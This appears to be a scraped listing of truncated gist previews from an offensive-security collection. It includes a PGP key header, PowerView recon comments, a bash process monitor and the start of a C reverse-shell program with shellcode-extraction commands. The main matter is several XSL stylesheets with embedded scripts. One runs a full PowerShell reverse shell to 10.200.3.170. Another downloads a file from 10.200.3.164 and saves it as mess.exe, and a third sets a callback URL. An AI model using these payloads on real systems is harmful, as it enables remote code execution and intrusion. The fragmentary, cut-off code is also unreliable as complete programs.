-----BEGIN PGP PUBLIC KEY BLOCK----- | |
Version: FlowCrypt Email Encryption - flowcrypt.com | |
Comment: Seamlessly send, receive and search encrypted email | |
xsFNBFyY868BEACqHhE2O0vEoFiLlmY2F20vf3lmheSESHENhE6QJFGmg4w5 | |
i+PwORdcYXH+2LSvu8+XFrF9HGMyYgP3e9hruJHqVolyTGNavRcwKUiIE9Qz | |
ZPEw9rZTHa3T3uupJJeQEWba5SFmbh5av9sZEqwPC2aiZX9Y4a0LBKHJA2rh | |
/+roJlpLrI2jAqDEJ0j1EfqXiGMcPiAfkiZp1KvKcPrElrIpP0ysnevKbdCO | |
Jkt/7W0cl1GxWcCqOyxjJwjJwj9JmsXgIUNMB//Cv1YYWkDmhfI8MQak8til | |
LGbNHnvWCIX74168kE57/J1rUCogHrrGzIqdH4TkuquN1FNIwkT+Cr1OfxH2 |
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
# New function naming schema: | |
# Verbs: | |
# Get : retrieve full raw data sets | |
# Find : ‘find’ specific data entries in a data set |
#!/bin/bash | |
# Loop by line | |
IFS=$'\n' | |
old_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0) | |
while true; do | |
new_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0) | |
diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>] |
/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */ | |
// | |
// gcc reverse_shell.c -fno-stack-protector -Os -z execstack -no-pie -o shellcode | |
// for i in `objdump -d ./shellcode | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" ; done ; echo | |
#include <stdio.h> | |
#include <unistd.h> | |
#include <netinet/in.h> | |
#include <sys/types.h> |
<?xml version='1.0'?> | |
<stylesheet | |
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
xmlns:user="placeholder" | |
version="1.0"> | |
<output method="text"/> | |
<ms:script implements-prefix="user" language="JScript"> | |
<![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -Command \"$client = New-Object System.Net.Sockets.TCPClient('10.200.3.170',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"",0,true); | |
]]> </ms:script> |
<?xml version='1.0'?> | |
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0"> | |
<output method="text"/> | |
<ms:script implements-prefix="user" language="VB"> | |
<![CDATA[ | |
strFileURL = "http://10.200.3.164/server.py" | |
strHDLocation = "mess.exe" | |
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") | |
objXMLHTTP.open "GET", strFileURL, false |
<?xml version='1.0'?> | |
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0"> | |
<output method="text"/> | |
<ms:script implements-prefix="user" language="VBScript"> | |
<![CDATA[ | |
Option Explicit | |
On Error Resume Next | |
CONST callbackUrl = "http://10.200.3.164:80/" |